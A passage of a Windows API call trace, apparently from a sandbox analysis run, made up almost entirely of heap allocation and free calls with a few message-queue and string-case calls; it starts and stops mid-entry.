0x2e51550 [0238.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0238.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55128 [0238.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0238.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55128 | out: hHeap=0x970000) returned 1 [0238.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0238.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0238.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0238.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0238.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55178 [0238.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0238.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55178 | out: hHeap=0x970000) returned 1 [0238.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0238.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0238.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0238.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0238.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55238 [0238.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0238.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55238 | out: hHeap=0x970000) returned 1 [0238.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0238.470] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0238.470] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0238.470] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0238.470] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552a8 [0238.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0238.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552a8 | out: hHeap=0x970000) returned 1 [0238.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0238.470] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0238.470] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0238.470] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0238.470] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55158 [0238.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0238.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55158 | out: hHeap=0x970000) returned 1 [0238.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0238.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0238.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0238.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0238.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0238.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0238.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0238.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0238.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5f8 | out: hHeap=0x970000) returned 1 [0238.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0238.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0238.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0238.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0238.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0238.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0238.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0238.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0238.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0238.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0238.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0238.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0238.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0238.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0238.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0238.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0238.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0238.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0238.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0238.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0238.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0238.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0238.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0238.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0238.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0238.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0238.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0238.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0238.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0238.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0238.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0238.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0238.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0238.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0238.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0238.472] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0238.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0238.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0238.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0238.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0238.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0238.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0238.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0238.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0238.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0238.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0238.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b48 [0238.473] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0238.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b48 | out: hHeap=0x970000) returned 1 [0238.473] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0238.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0238.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0238.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0238.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0238.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0238.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0238.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0238.473] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0238.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0238.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0238.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0238.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0238.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0238.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0238.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0238.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0238.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0238.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0238.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0238.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f490 [0238.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0238.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0238.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0238.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0238.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0238.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0238.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0238.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0238.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b88 [0238.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0238.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f508 [0238.474] CharLowerBuffW (in: lpsz="byte[16056]", cchLength=0xb | out: lpsz="byte[16056]") returned 0xb [0238.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977ae8 [0238.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0238.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0238.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0238.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0238.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0238.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0238.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0238.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0238.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0238.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0238.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0238.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0238.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0238.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0238.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0238.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3eb8) returned 0x2f1c588 [0238.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f508 | out: hHeap=0x970000) returned 1 [0238.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0238.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f490 | out: hHeap=0x970000) returned 1 [0238.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0238.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0238.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0238.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0238.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0238.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0238.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0238.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0238.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a68 [0238.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977938 [0238.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0238.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0238.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0238.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0238.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977ae8 | out: hHeap=0x970000) returned 1 [0238.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0238.476] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0238.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0238.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0238.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0238.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0238.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9779f8 [0238.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0238.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0238.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0238.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0238.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0238.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0238.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0238.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0238.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0238.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3eb0) returned 0x2f20448 [0238.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0238.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0238.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3eb0) returned 0x2f24300 [0238.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0238.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0238.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9779f8 | out: hHeap=0x970000) returned 1 [0238.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0238.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0238.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0238.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f20448 | out: hHeap=0x970000) returned 1 [0238.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0238.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0238.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0238.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f24300 | out: hHeap=0x970000) returned 1 [0238.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0238.525] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0238.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0238.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0238.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0238.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0238.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04230 [0238.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0238.525] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0238.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04230 | out: hHeap=0x970000) returned 1 [0238.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0238.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51220 [0238.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0238.526] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0238.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0238.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0238.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0238.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0238.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0238.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0238.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0238.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0238.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0238.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0238.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0238.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0238.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0238.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0238.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0238.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0238.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0238.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0238.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0238.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f7b0 [0238.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0238.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0238.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0238.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0238.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0238.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0238.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0238.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0238.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0238.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0238.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0238.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0238.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0238.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0238.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0238.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0238.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f7b0 | out: hHeap=0x970000) returned 1 [0238.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0238.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0238.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0238.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0238.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, 